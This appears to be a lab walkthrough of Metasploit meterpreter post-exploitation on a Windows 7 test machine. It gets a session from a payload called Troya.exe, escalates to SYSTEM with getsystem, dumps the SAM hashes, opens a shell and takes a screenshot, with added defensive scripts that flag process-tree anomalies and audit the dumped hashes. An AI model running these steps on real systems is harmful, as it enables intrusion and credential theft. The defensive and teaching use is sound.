
1. Session ID

msf6 exploit(multi/handler) > sessions -l

Active sessions
===============

Id Name Type Information Connection
-- ---- ---- ----------- ----------
1 meterpreter x64/windows test-PC\victima @ TEST-PC 192.168.2.4:5344 -> 192.168.2.5:49320 (192.168.2.5)

2. Host information

meterpreter > sysinfo
Computer : TEST-PC
OS : Windows 7 (6.1 Build 7601, Service Pack 1).
Architecture : x64
System Language : es_CO
Domain : WORKGROUP
Logged On Users : 2
Meterpreter : x64/windows
meterpreter >

3. User information

meterpreter > getuid
Server username: test-PC\victima
meterpreter > getprivs

Enabled Process Privileges
==========================

Name
----
SeBackupPrivilege
SeChangeNotifyPrivilege
SeCreateGlobalPrivilege
SeCreatePagefilePrivilege
SeCreateSymbolicLinkPrivilege
SeDebugPrivilege
SeImpersonatePrivilege
SeIncreaseBasePriorityPrivilege
SeIncreaseQuotaPrivilege
SeIncreaseWorkingSetPrivilege
SeLoadDriverPrivilege
SeManageVolumePrivilege
SeProfileSingleProcessPrivilege
SeRemoteShutdownPrivilege
SeRestorePrivilege
SeSecurityPrivilege
SeShutdownPrivilege
SeSystemEnvironmentPrivilege
SeSystemProfilePrivilege
SeSystemtimePrivilege
SeTakeOwnershipPrivilege
SeTimeZonePrivilege
SeUndockPrivilege
meterpreter > getsystem
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter >

4. List processes

meterpreter > ps

Process List
============

PID PPID Name Arch Session User Path
--- ---- ---- ---- ------- ---- ----
0 0 [System Process]
4 0 System x64 0
252 4 smss.exe x64 0 NT AUTHORITY\SYSTEM \SystemRoot\System32\smss.exe
288 464 svchost.exe x64 0 NT AUTHORITY\Servicio de red C:\Windows\system32\svchost.exe
332 324 csrss.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\system32\csrss.exe
368 360 csrss.exe x64 1 NT AUTHORITY\SYSTEM C:\Windows\system32\csrss.exe
376 324 wininit.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\system32\wininit.exe
404 360 winlogon.exe x64 1 NT AUTHORITY\SYSTEM C:\Windows\system32\winlogon.exe
464 376 services.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\system32\services.exe
472 376 lsass.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\system32\lsass.exe
480 376 lsm.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\system32\lsm.exe
552 464 sppsvc.exe x64 0 NT AUTHORITY\Servicio de red C:\Windows\system32\sppsvc.exe
576 464 svchost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\system32\svchost.exe
644 464 svchost.exe x64 0 NT AUTHORITY\Servicio de red C:\Windows\system32\svchost.exe
732 464 svchost.exe x64 0 NT AUTHORITY\SERVICIO LOCAL C:\Windows\System32\svchost.exe
772 464 svchost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\svchost.exe
796 464 svchost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\system32\svchost.exe
940 464 svchost.exe x64 0 NT AUTHORITY\SERVICIO LOCAL C:\Windows\system32\svchost.exe
984 368 conhost.exe x64 1 test-PC\victima C:\Windows\system32\conhost.exe
1052 464 spoolsv.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\spoolsv.exe
1088 464 svchost.exe x64 0 NT AUTHORITY\SERVICIO LOCAL C:\Windows\system32\svchost.exe
1148 3036 powershell.exe x64 1 test-PC\victima C:\Windows\System32\WindowsPowerShell\v1.0\POWErshElL.exe
1168 2016 explorer.exe x64 1 test-PC\victima C:\Windows\Explorer.EXE
1200 464 svchost.exe x64 0 NT AUTHORITY\SERVICIO LOCAL C:\Windows\system32\svchost.exe
1508 2232 powershell.exe x64 1 test-PC\victima C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
1668 464 wmpnetwk.exe x64 0 NT AUTHORITY\Servicio de red C:\Program Files\Windows Media Player\wmpnetwk.exe
1780 464 SearchIndexer.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\system32\SearchIndexer.exe
1856 3540 powershell.exe x64 1 test-PC\victima C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
1968 464 taskhost.exe x64 1 test-PC\victima C:\Windows\system32\taskhost.exe
2036 772 dwm.exe x64 1 test-PC\victima C:\Windows\system32\Dwm.exe
2112 464 svchost.exe x64 0 NT AUTHORITY\SERVICIO LOCAL C:\Windows\System32\svchost.exe
2232 1148 powershell.exe x64 1 test-PC\victima C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
2248 1508 cmd.exe x64 1 test-PC\victima C:\Windows\system32\cmd.exe
2452 732 audiodg.exe x64 0
2860 1168 cmd.exe x64 1 test-PC\victima C:\Windows\system32\cmd.exe
2892 368 conhost.exe x64 1 test-PC\victima C:\Windows\system32\conhost.exe
3236 368 conhost.exe x64 1 test-PC\victima C:\Windows\system32\conhost.exe
3308 368 conhost.exe x64 1 test-PC\victima C:\Windows\system32\conhost.exe
3404 464 svchost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\svchost.exe
3464 1856 powershell.exe x64 1 test-PC\victima C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
3540 3780 powershell.exe x64 1 test-PC\victima C:\Windows\System32\WindowsPowerShell\v1.0\POWErshElL.exe
3780 1168 Troya.exe x64 1 test-PC\victima C:\Users\victima\Desktop\Troya.exe

meterpreter >
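From the defender's side, the listing above contains the signals an EDR rule or a SOC analyst keys on: Troya.exe running from a user's Desktop, a chain of powershell.exe processes descending from it, and two PowerShell images whose path casing (POWErshElL.exe) does not match the on-disk file name. The script below is an added example, not part of the original write-up: it parses the text format that ps prints and applies those three checks. SAMPLE_PS is a constructed subset of the page's rows with the PDF line wraps rejoined; the list of user-writable directories and the set of interpreters are assumptions chosen for illustration.

```python
"""Triage a Meterpreter `ps` listing for process-tree anomalies (added example)."""
import re
from dataclasses import dataclass

# Constructed sample: a subset of the page's `ps` rows, one process per line.
SAMPLE_PS = r"""
PID PPID Name Arch Session User Path
--- ---- ---- ---- ------- ---- ----
0 0 [System Process]
4 0 System x64 0
252 4 smss.exe x64 0 NT AUTHORITY\SYSTEM \SystemRoot\System32\smss.exe
464 376 services.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\system32\services.exe
1148 3036 powershell.exe x64 1 test-PC\victima C:\Windows\System32\WindowsPowerShell\v1.0\POWErshElL.exe
1168 2016 explorer.exe x64 1 test-PC\victima C:\Windows\Explorer.EXE
1508 2232 powershell.exe x64 1 test-PC\victima C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
1668 464 wmpnetwk.exe x64 0 NT AUTHORITY\Servicio de red C:\Program Files\Windows Media Player\wmpnetwk.exe
1856 3540 powershell.exe x64 1 test-PC\victima C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
2232 1148 powershell.exe x64 1 test-PC\victima C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
2248 1508 cmd.exe x64 1 test-PC\victima C:\Windows\system32\cmd.exe
2452 732 audiodg.exe x64 0
2860 1168 cmd.exe x64 1 test-PC\victima C:\Windows\system32\cmd.exe
3464 1856 powershell.exe x64 1 test-PC\victima C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
3540 3780 powershell.exe x64 1 test-PC\victima C:\Windows\System32\WindowsPowerShell\v1.0\POWErshElL.exe
3780 1168 Troya.exe x64 1 test-PC\victima C:\Users\victima\Desktop\Troya.exe
"""

# Columns are space separated, but User and Path may themselves contain spaces,
# so the user field is matched lazily up to the first token that looks like a path.
ROW = re.compile(
    r"^(?P<pid>\d+)\s+(?P<ppid>\d+)\s+(?P<name>\[System Process\]|\S+)"
    r"(?:\s+(?P<arch>x64|x86)\s+(?P<session>\d+)"
    r"(?:\s+(?P<user>.+?)\s+(?P<path>(?:[A-Za-z]:\\|\\)\S.*))?)?\s*$"
)

# Assumed for illustration: directories a standard user can write to, and the
# interpreters whose on-disk image names are known to be lowercase.
USER_WRITABLE = ("\\users\\", "\\temp\\", "\\programdata\\")
INTERPRETERS = {"powershell.exe", "cmd.exe"}


@dataclass
class Proc:
    pid: int
    ppid: int
    name: str
    user: str
    path: str


def parse_ps(text):
    """Return {pid: Proc}; header, separator and blank lines are skipped."""
    procs = {}
    for line in text.splitlines():
        m = ROW.match(line.strip())
        if m:
            pid = int(m["pid"])
            procs[pid] = Proc(pid, int(m["ppid"]), m["name"], m["user"] or "", m["path"] or "")
    return procs


def ancestors(procs, pid):
    """Yield parent, grandparent, ... until the chain leaves the listing or loops."""
    seen = set()
    p = procs.get(pid)
    while p and p.ppid in procs and p.ppid != p.pid and p.ppid not in seen:
        seen.add(p.ppid)
        p = procs[p.ppid]
        yield p


def triage(procs):
    """Return (pid, finding, detail) tuples for the three checks."""
    findings = []
    for p in procs.values():
        low = p.path.lower()
        base = p.path.rsplit("\\", 1)[-1]
        if any(d in low for d in USER_WRITABLE):
            findings.append((p.pid, "image in user-writable path", p.path))
        if p.name.lower() in INTERPRETERS:
            if base and base != p.name.lower():
                # Case-mangled image names defeat naive case-sensitive string matches.
                findings.append((p.pid, "non-canonical interpreter image casing", base))
            for a in ancestors(procs, p.pid):
                if any(d in a.path.lower() for d in USER_WRITABLE):
                    findings.append((p.pid, "interpreter descended from user-writable image",
                                     f"{a.name} (pid {a.pid})"))
                    break
    return findings


if __name__ == "__main__":
    for pid, kind, detail in triage(parse_ps(SAMPLE_PS)):
        print(f"{pid:>5}  {kind:<45} {detail}")
```

The ancestry walk stops when a parent PID is missing from the listing (1148's parent 3036 has already exited), so the second PowerShell chain is not attributed to anything; on a live host the same check would be run against a process-creation log (Sysmon event 1 or the equivalent) where the parent image survives.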

5. Copy of the SAM hashes

meterpreter > hashdump
Administrador:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
HomeGroupUser$:1002:aad3b435b51404eeaad3b435b51404ee:1ba39fdd7b6bea2ea561ca8704d6e463:::
Invitado:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
test:1001:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
victima:1003:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
meterpreter >
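Every account in the dump except HomeGroupUser$ carries 31d6cfe0d16ae931b73c59d7e0c089c0, the NT hash of the empty password, and the LM field is the empty-LM value aad3b435b51404eeaad3b435b51404ee throughout, meaning LM hashes are not being stored. The script below is an added example, not from the original write-up: it parses pwdump-format lines and reports the findings an auditor would write up (blank passwords, stored LM hashes, NT hashes shared between accounts). SAMPLE_HASHDUMP is the page's own output with the PDF line wraps rejoined.

```python
"""Audit a pwdump-style hashdump listing for credential-hygiene findings (added example)."""
import re
from collections import defaultdict

# Well-known constants: the LM hash of the empty string (what the SAM holds when
# LM hashing is disabled) and the NT hash (MD4 of UTF-16LE "") of an empty password.
EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"

# The page's hashdump output, rejoined into one line per account.
SAMPLE_HASHDUMP = """\
Administrador:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
HomeGroupUser$:1002:aad3b435b51404eeaad3b435b51404ee:1ba39fdd7b6bea2ea561ca8704d6e463:::
Invitado:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
test:1001:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
victima:1003:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
"""

# user:rid:lm:nt::: as printed by hashdump (pwdump format).
LINE = re.compile(
    r"^(?P<user>[^:]+):(?P<rid>\d+):(?P<lm>[0-9a-fA-F]{32}):(?P<nt>[0-9a-fA-F]{32}):::$"
)


def parse_hashdump(text):
    """Return a list of (user, rid, lm, nt) tuples; malformed lines are skipped."""
    accounts = []
    for line in text.splitlines():
        m = LINE.match(line.strip())
        if m:
            accounts.append((m["user"], int(m["rid"]), m["lm"].lower(), m["nt"].lower()))
    return accounts


def audit(accounts):
    """Return {user: [finding, ...]} for accounts with at least one finding."""
    issues = defaultdict(list)
    by_nt = defaultdict(list)
    for user, rid, lm, nt in accounts:
        if nt == EMPTY_NT:
            issues[user].append("blank password")
            if rid == 500:
                issues[user].append("built-in Administrator (RID 500) has blank password")
        if lm != EMPTY_LM:
            issues[user].append("LM hash stored (LM hashing not disabled)")
        by_nt[nt].append(user)
    # Two accounts with the same non-empty NT hash share the same password.
    for nt, users in by_nt.items():
        if nt != EMPTY_NT and len(users) > 1:
            for u in users:
                others = ", ".join(x for x in users if x != u)
                issues[u].append("NT hash shared with: " + others)
    return dict(issues)


if __name__ == "__main__":
    for user, findings in audit(parse_hashdump(SAMPLE_HASHDUMP)).items():
        print(f"{user}: {'; '.join(findings)}")
```

hashdump does not report whether an account is enabled; on a default Windows 7 install the built-in Administrator and Guest accounts are disabled, so confirm account status (net user <name>) before treating a blank RID 500 password as a live exposure rather than a configuration finding.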

6. Start a shell

meterpreter > shell
Process 3916 created.
Channel 2 created.
Microsoft Windows [Versión 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. Reservados todos los derechos.

C:\Windows\system32>cd /
cd /

C:\>dir
dir
El volumen de la unidad C no tiene etiqueta.
El número de serie del volumen es: 8031-DD9E

Directorio de C:\

13/07/2009 10:20 p.m. <DIR> PerfLogs
08/05/2021 12:22 a.m. <DIR> Program Files
08/05/2021 12:23 a.m. <DIR> Program Files (x86)
08/05/2021 01:38 p.m. <DIR> Users
23/04/2021 09:02 p.m. <DIR> Windows
0 archivos 0 bytes
5 dirs 1.958.588.416 bytes libres

C:\>

7. Take a screenshot

meterpreter > screenshot
Screenshot saved to: /home/kali/MWujvuxO.jpeg
meterpreter >
